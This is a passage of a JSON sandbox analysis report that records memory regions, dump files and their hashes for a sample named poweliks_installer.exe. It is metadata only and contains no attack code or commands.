"archive_path": "process_dumps/process_00000006-region_00001061-addr_0x00000000028a0000-size_0x0000000000100000-perm_rw.bin", "filename": "process_00000006-region_00001061-addr_0x00000000028a0000-size_0x0000000000100000-perm_rw.bin", "id": "proc_dump_243", "md5_hash": "6b951b08eda8424a96a9c6db3d621a25", "ref_process": { "ref_id": "proc_6", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "54e905fa2e3fe317697c1e1b787f077d56a8c365", "sha256_hash": "9a0a3e34a9fbf4ba570b66e5c0afaae11db84169e30a7f9908a96b530b497735", "size": 36864, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000006-region_00001068-addr_0x000000007efa7000-size_0x0000000000003000-perm_rw.bin", "filename": "process_00000006-region_00001068-addr_0x000000007efa7000-size_0x0000000000003000-perm_rw.bin", "id": "proc_dump_244", "md5_hash": "408a600627ac8df773318708a3d328d4", "ref_process": { "ref_id": "proc_6", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "659b0e5596979356be7d79fa3c8554d82a4894dc", "sha256_hash": "553b304ced28c388411f73890a4ee3c38a3008063d038abb254edb065845f32f", "size": 12288, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000006-region_00001069-addr_0x000000007efaa000-size_0x0000000000003000-perm_rw.bin", "filename": "process_00000006-region_00001069-addr_0x000000007efaa000-size_0x0000000000003000-perm_rw.bin", "id": "proc_dump_245", "md5_hash": "6928f7b7cd7de46e9e8f04bd7ba14450", "ref_process": { "ref_id": "proc_6", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "30d4df4f81c859346d779f3a789988734f5127c4", "sha256_hash": "cb5ce049d143ddfe0b025b871fb078a2cb3328da610eda85b733f97ffafbe01e", "size": 12288, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000006-region_00001070-addr_0x0000000002010000-size_0x0000000000010000-perm_rw.bin", "filename": "process_00000006-region_00001070-addr_0x0000000002010000-size_0x0000000000010000-perm_rw.bin", "id": "proc_dump_246", "md5_hash": "44a11ca23e901be06950b50b7688dd3d", "ref_process": { "ref_id": "proc_6", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "3263de9f8afb11211fa9719449fe180d1bfd04cb", "sha256_hash": "6d1a0c63ac9c16cf990dd3398d84de1e1f9f95b7573c49e237526213fbad84e9", "size": 65536, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000006-region_00001080-addr_0x0000000002030000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000006-region_00001080-addr_0x0000000002030000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_247", "md5_hash": "7c96a03049af366b00a9d2406aa22047", "ref_process": { "ref_id": "proc_6", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "40d1f28a9d61b40be85246003ae162f86fe33405", "sha256_hash": "14d9f7e20516ebca451bae325fc086cbfe6e2b87fff4d41baa43b9499953efc2", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000007-region_00001143-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "filename": "process_00000007-region_00001143-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "id": "proc_dump_268", "md5_hash": "fd7f0386df983e2642f93156864ff2f9", "ref_process": { "ref_id": "proc_7", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "a0445221bf4b1abc602d8ba08e71f1ba4e16a508", "sha256_hash": "7e3348b5a96fb0b7c225c866d725482034467e4d889ba4a220f2e015e0bb3511", "size": 131072, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000007-region_00001144-addr_0x0000000000030000-size_0x0000000000002000-perm_rw.bin", "filename": "process_00000007-region_00001144-addr_0x0000000000030000-size_0x0000000000002000-perm_rw.bin", "id": "proc_dump_269", "md5_hash": "d30cfd6d0643c7403a7720c4a6c56183", "ref_process": { "ref_id": "proc_7", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "f982343322d45ee3a6400f452431da1a90c2db5e", "sha256_hash": "d0f9c7c01aa75f8c3e9d51d9c72c19a61a42a84e53a62f2b2591585e77769b13", "size": 8192, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000007-region_00001147-addr_0x0000000000070000-size_0x0000000000040000-perm_rw.bin", "filename": "process_00000007-region_00001147-addr_0x0000000000070000-size_0x0000000000040000-perm_rw.bin", "id": "proc_dump_270", "md5_hash": "216faf0b1a2b2940d24080be2995bafd", "ref_process": { "ref_id": "proc_7", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "63a6098f13687c35ec069132f8831c65a6ea6110", "sha256_hash": "916a939303bee6039e682cfb3b837a8dea25344b48d4d52dafd33b9d070ac8a9", "size": 262144, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000007-region_00001148-addr_0x00000000001d0000-size_0x0000000000040000-perm_rw.bin", "filename": "process_00000007-region_00001148-addr_0x00000000001d0000-size_0x0000000000040000-perm_rw.bin", "id": "proc_dump_271", "md5_hash": "bccd51995d531dbc9c6154d56172ecd7", "ref_process": { "ref_id": "proc_7", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "ec9424acbf8b83b2023a10a0b96726705e9ffaec", "sha256_hash": "087c4e74632c9299c7af65d0eb6a8f36c291f6ebd848171b745a39c11914ede9", "size": 262144, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000007-region_00001153-addr_0x000000007efdb000-size_0x0000000000003000-perm_rw.bin", "filename": "process_00000007-region_00001153-addr_0x000000007efdb000-size_0x0000000000003000-perm_rw.bin", "id": "proc_dump_272", "md5_hash": "f24fe543d00d2d0c4d97166c98a68a9a", "ref_process": { "ref_id": "proc_7", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "016ed48c24ca610d62693ace98b22045aef63c34", "sha256_hash": "707746edeee2ea86164e90e3874fd12e91cd1e58543fae8aca0a3d7c2a517245", "size": 12288, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000007-region_00001195-addr_0x0000000000740000-size_0x0000000000130000-perm_rw.bin", "filename": "process_00000007-region_00001195-addr_0x0000000000740000-size_0x0000000000130000-perm_rw.bin", "id": "proc_dump_273", "md5_hash": "fa1ab9e0d584610378b2a0efc2fcbd59", "ref_process": { "ref_id": "proc_7", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "5c444a03df3c77dc102f6443a9593ba9fd61e59c", "sha256_hash": "02f18108dfb6866e15f96251665c2541d4394e2d16b32fc9a02ffb37d3279958", "size": 1245184, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000007-region_00001204-addr_0x0000000000870000-size_0x0000000000130000-perm_rw.bin", "filename": "process_00000007-region_00001204-addr_0x0000000000870000-size_0x0000000000130000-perm_rw.bin", "id": "proc_dump_274", "md5_hash": "fa1ab9e0d584610378b2a0efc2fcbd59", "ref_process": { "ref_id": "proc_7", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "5c444a03df3c77dc102f6443a9593ba9fd61e59c", "sha256_hash": "02f18108dfb6866e15f96251665c2541d4394e2d16b32fc9a02ffb37d3279958", "size": 1245184, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000007-region_00001208-addr_0x0000000000210000-size_0x0000000000040000-perm_rw.bin", "filename": "process_00000007-region_00001208-addr_0x0000000000210000-size_0x0000000000040000-perm_rw.bin", "id": "proc_dump_275", "md5_hash": "0058b2a370167c81e6fbbf88671eead4", "ref_process": { "ref_id": "proc_7", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "c72de803fcf0631f6a4b6b7b028a2a99e551634b", "sha256_hash": "204c1199e9fd90f51a3d5518d23645e2ff8654ab35575e86c8f4f86407066635", "size": 262144, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000007-region_00001209-addr_0x0000000000890000-size_0x0000000000040000-perm_rw.bin", "filename": "process_00000007-region_00001209-addr_0x0000000000890000-size_0x0000000000040000-perm_rw.bin", "id": "proc_dump_276", "md5_hash": "c937af8e4682ba89e4c56e4c43a15a0d", "ref_process": { "ref_id": "proc_7", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "52a78f786fe6844a17d309594d26b1fc073eeee8", "sha256_hash": "f8626382ef9bc9803f02b23f2368ff0dcd730656a5173837f60a0ec3a0b0b49e", "size": 262144, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000007-region_00001211-addr_0x000000007efd8000-size_0x0000000000003000-perm_rw.bin", "filename": "process_00000007-region_00001211-addr_0x000000007efd8000-size_0x0000000000003000-perm_rw.bin", "id": "proc_dump_277", "md5_hash": "2e7bdffba758eca7605da24ee419ccea", "ref_process": { "ref_id": "proc_7", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "a6bf0e73665808b5370e044188fdc1d161e2aba3", "sha256_hash": "4271486dce602e513cd3a3e90339b4b14bad12b1a18de0063d62ae6fb4e5273c", "size": 12288, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000007-region_00001213-addr_0x0000000004460000-size_0x0000000000210000-perm_rw.bin", "filename": "process_00000007-region_00001213-addr_0x0000000004460000-size_0x0000000000210000-perm_rw.bin", "id": "proc_dump_278", "md5_hash": "80072f62e3c4fe4641d2fa52617e2f51", "ref_process": { "ref_id": "proc_7", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "88ce190e9d5d1ad11b376985a10b26810910201a", "sha256_hash": "4ae70c6f68d5ee9e0fd76859ef11ae6604f3f472dedc7125bb9810a8adc3b183", "size": 2162688, "type": "process_dump", "version": 1 } ], "processes": [ { "cmd_line": "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\poweliks_installer.exe\" ", "filename": "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\poweliks_installer.exe", "id": "proc_1", "image_name": "poweliks_installer.exe", "monitor_reason": "analysis_target", "monitored_id": 1, "origin_monitor_id": 0, "ref_parent_process": null, "regions": [ { "dump": { "filename": "process_00000001-region_00000001-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_5", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_1", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:00:10.329", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000002-addr_0x0000000000030000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_6", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 204799, "entry_point": 0, "filename": null, "id": "region_2", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:00:10.329", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 262144, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_3", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 262144, "timestamp": "00:00:10.329", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000004-addr_0x0000000000050000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_7", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 589823, "entry_point": 0, "filename": null, "id": "region_4", "name": "private_0x0000000000050000", "norm_filename": null, "region_type": "private_memory", "start_va": 327680, "timestamp": "00:00:10.334", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000005-addr_0x0000000000090000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_8", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 589824, "type": "region", "version": 1 }, "end_va": 1638399, "entry_point": 0, "filename": null, "id": "region_5", "name": "private_0x0000000000090000", "norm_filename": null, "region_type": "private_memory", "start_va": 589824, "timestamp": "00:00:10.335", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 1638400, "type": "region", "version": 1 }, "end_va": 1654783, "entry_point": 0, "filename": null, "id": "region_6", "name": "pagefile_0x0000000000190000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1638400, "timestamp": "00:00:10.335", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000007-addr_0x0000000000400000-size_0x0000000000015000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_9", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 86016, "start_va": 4194304, "type": "region", "version": 1 }, "end_va": 4280319, "entry_point": 4194304, "filename": "\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\poweliks_installer.exe", "id": "region_7", "name": "poweliks_installer.exe", "norm_filename": "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\poweliks_installer.exe", "region_type": "memory_mapped_file", "start_va": 4194304, "timestamp": "00:00:10.335", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 2000158720, "type": "region", "version": 1 }, "end_va": 2001899519, "entry_point": 2000158720, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_8", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2000158720, "timestamp": "00:00:10.335", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1572864, "start_va": 2002124800, "type": "region", "version": 1 }, "end_va": 2003697663, "entry_point": 2002124800, "filename": "\\Windows\\SysWOW64\\ntdll.dll", "id": "region_9", "name": "ntdll.dll", "norm_filename": "c:\\windows\\syswow64\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2002124800, "timestamp": "00:00:10.412", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2130378752, "type": "region", "version": 1 }, "end_va": 2130522111, "entry_point": 0, "filename": null, "id": "region_10", "name": "pagefile_0x000000007efb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130378752, "timestamp": "00:00:10.505", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000011-addr_0x000000007efdb000-size_0x0000000000003000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_10", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 12288, "start_va": 2130554880, "type": "region", "version": 1 }, "end_va": 2130567167, "entry_point": 0, "filename": null, "id": "region_11", "name": "private_0x000000007efdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130554880, "timestamp": "00:00:10.506", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000012-addr_0x000000007efde000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_11", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2130567168, "type": "region", "version": 1 }, "end_va": 2130571263, "entry_point": 0, "filename": null, "id": "region_12", "name": "private_0x000000007efde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130567168, "timestamp": "00:00:10.506", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000013-addr_0x000000007efdf000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_12", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2130571264, "type": "region", "version": 1 }, "end_va": 2130575359, "entry_point": 0, "filename": null, "id": "region_13", "name": "private_0x000000007efdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130571264, "timestamp": "00:00:10.506", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_14", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:00:10.507", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000015-addr_0x000000007ffe0000-size_0x0000000000010000-perm_r.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable" ], "ref_process_dump": { "ref_id": "proc_dump_13", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_15", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:00:10.507", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "ignored_region" ], "info": "No dump was created because this is an ignored region", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8793945538560, "start_va": 2147418112, "type": "region", "version": 1 }, "end_va": 8796092956671, "entry_point": 0, "filename": null, "id": "region_16", "name": "private_0x000000007fff0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147418112, "timestamp": "00:00:10.507", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000149-addr_0x0000000000240000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_14", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 2359296, "type": "region", "version": 1 }, "end_va": 2883583, "entry_point": 0, "filename": null, "id": "region_149", "name": "private_0x0000000000240000", "norm_filename": null, "region_type": "private_memory", "start_va": 2359296, "timestamp": "00:00:11.972", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1940324352, "type": "region", "version": 1 }, "end_va": 1940701183, "entry_point": 1940324352, "filename": "\\Windows\\System32\\wow64win.dll", "id": "region_150", "name": "wow64win.dll", "norm_filename": "c:\\windows\\system32\\wow64win.dll", "region_type": "memory_mapped_file", "start_va": 1940324352, "timestamp": "00:00:11.972", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 258048, "start_va": 1940717568, "type": "region", "version": 1 }, "end_va": 1940975615, "entry_point": 1940717568, "filename": "\\Windows\\System32\\wow64.dll", "id": "region_151", "name": "wow64.dll", "norm_filename": "c:\\windows\\system32\\wow64.dll", "region_type": "memory_mapped_file", "start_va": 1940717568, "timestamp": "00:00:11.979", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1941176320, "type": "region", "version": 1 }, "end_va": 1941209087, "entry_point": 1941176320, "filename": "\\Windows\\System32\\wow64cpu.dll", "id": "region_152", "name": "wow64cpu.dll", "norm_filename": "c:\\windows\\system32\\wow64cpu.dll", "region_type": "memory_mapped_file", "start_va": 1941176320, "timestamp": "00:00:11.986", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000153-addr_0x00000000004c0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_15", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 4980736, "type": "region", "version": 1 }, "end_va": 6029311, "entry_point": 0, "filename": null, "id": "region_153", "name": "private_0x00000000004c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 4980736, "timestamp": "00:00:12.002", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 286720, "start_va": 1966211072, "type": "region", "version": 1 }, "end_va": 1966497791, "entry_point": 1966211072, "filename": "\\Windows\\SysWOW64\\KernelBase.dll", "id": "region_154", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\syswow64\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1966211072, "timestamp": "00:00:12.002", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1114112, "start_va": 1985675264, "type": "region", "version": 1 }, "end_va": 1986789375, "entry_point": 1985675264, "filename": "\\Windows\\SysWOW64\\kernel32.dll", "id": "region_155", "name": "kernel32.dll", "norm_filename": "c:\\windows\\syswow64\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1985675264, "timestamp": "00:00:12.050", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000156-addr_0x0000000077160000-size_0x00000000000fa000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_16", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1024000, "start_va": 1997930496, "type": "region", "version": 1 }, "end_va": 1998954495, "entry_point": 0, "filename": null, "id": "region_156", "name": "private_0x0000000077160000", "norm_filename": null, "region_type": "private_memory", "start_va": 1997930496, "timestamp": "00:00:12.224", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000157-addr_0x0000000077260000-size_0x000000000011f000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_17", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1175552, "start_va": 1998979072, "type": "region", "version": 1 }, "end_va": 2000154623, "entry_point": 0, "filename": null, "id": "region_157", "name": "private_0x0000000077260000", "norm_filename": null, "region_type": "private_memory", "start_va": 1998979072, "timestamp": "00:00:12.224", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_158", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:00:12.232", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 1703936, "type": "region", "version": 1 }, "end_va": 2125823, "entry_point": 1703936, "filename": "\\Windows\\System32\\locale.nls", "id": "region_159", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 1703936, "timestamp": "00:00:12.232", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1963655168, "type": "region", "version": 1 }, "end_va": 1963704319, "entry_point": 1963655168, "filename": "\\Windows\\SysWOW64\\cryptbase.dll", "id": "region_160", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\syswow64\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1963655168, "timestamp": "00:00:12.233", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1963720704, "type": "region", "version": 1 }, "end_va": 1964113919, "entry_point": 1963720704, "filename": "\\Windows\\SysWOW64\\sspicli.dll", "id": "region_161", "name": "sspicli.dll", "norm_filename": "c:\\windows\\syswow64\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 1963720704, "timestamp": "00:00:12.240", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1048576, "start_va": 1964113920, "type": "region", "version": 1 }, "end_va": 1965162495, "entry_point": 1964113920, "filename": "\\Windows\\SysWOW64\\user32.dll", "id": "region_162", "name": "user32.dll", "norm_filename": "c:\\windows\\syswow64\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1964113920, "timestamp": "00:00:12.248", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1965293568, "type": "region", "version": 1 }, "end_va": 1965395967, "entry_point": 1965293568, "filename": "\\Windows\\SysWOW64\\sechost.dll", "id": "region_163", "name": "sechost.dll", "norm_filename": "c:\\windows\\syswow64\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1965293568, "timestamp": "00:00:12.298", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1965424640, "type": "region", "version": 1 }, "end_va": 1966129151, "entry_point": 1965424640, "filename": "\\Windows\\SysWOW64\\msvcrt.dll", "id": "region_164", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\syswow64\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1965424640, "timestamp": "00:00:12.306", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 983040, "start_va": 1966866432, "type": "region", "version": 1 }, "end_va": 1967849471, "entry_point": 1966866432, "filename": "\\Windows\\SysWOW64\\rpcrt4.dll", "id": "region_165", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1966866432, "timestamp": "00:00:12.319", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 589824, "start_va": 1968046080, "type": "region", "version": 1 }, "end_va": 1968635903, "entry_point": 1968046080, "filename": "\\Windows\\SysWOW64\\gdi32.dll", "id": "region_166", "name": "gdi32.dll", "norm_filename": "c:\\windows\\syswow64\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 1968046080, "timestamp": "00:00:12.568", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1987379200, "type": "region", "version": 1 }, "end_va": 1987420159, "entry_point": 1987379200, "filename": "\\Windows\\SysWOW64\\lpk.dll", "id": "region_167", "name": "lpk.dll", "norm_filename": "c:\\windows\\syswow64\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1987379200, "timestamp": "00:00:12.605", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1987444736, "type": "region", "version": 1 }, "end_va": 1988100095, "entry_point": 1987444736, "filename": "\\Windows\\SysWOW64\\advapi32.dll", "id": "region_168", "name": "advapi32.dll", "norm_filename": "c:\\windows\\syswow64\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1987444736, 